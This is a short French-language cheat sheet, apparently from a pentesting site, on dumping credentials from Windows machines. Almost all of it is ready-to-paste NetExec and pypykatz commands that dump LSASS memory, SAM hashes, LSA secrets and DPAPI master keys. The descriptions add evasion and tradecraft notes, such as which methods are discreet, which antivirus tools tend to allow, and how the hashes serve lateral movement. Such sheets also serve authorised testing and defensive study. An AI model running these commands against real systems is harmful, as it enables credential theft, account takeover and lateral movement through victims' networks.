Windows Privilege Escalation

Credential Dumping

Extraire des credentials depuis LSASS, SAM, LSA et DPAPI sur les machines Windows.

LSASS

Copy command
nxc smb $TARGET -u $USER -p $PASS -M nanodump

Description: Dump LSASS via nanodump : discret, ne touche pas le processus lsass.exe directement.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M lsassy

Description: lsassy : dump et parse LSASS en une seule opération, retourne les creds directement.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M procdump

Description: Dump via procdump.exe (Sysinternals) : bruyant mais souvent autorisé par les AV.

Copy command
pypykatz lsa minidump lsass.dmp

Description: Parser un minidump LSASS offline via pypykatz : extraire NT hashes et tickets Kerberos.

SAM & Registry

Copy command
nxc smb $TARGET -u $USER -p $PASS --sam

Description: Dump SAM via NXC : hashes des comptes locaux, utile pour le mouvement latéral.

Copy command
nxc smb $TARGET -u $USER -p $PASS --lsa

Description: LSA secrets : mots de passe en cache, comptes de service, DCC2 hashes.

Copy command
nxc smb $TARGET -u $USER -p $PASS --dpapi

Description: Dump DPAPI : clés maîtresses et secrets protégés (passwords manager, wifi, etc.).

Copy command
nxc smb $TARGET -u $USER -p $PASS --sam --lsa --dpapi

Description: Collecte complète en une passe : SAM + LSA + DPAPI pour tout récupérer d'un coup.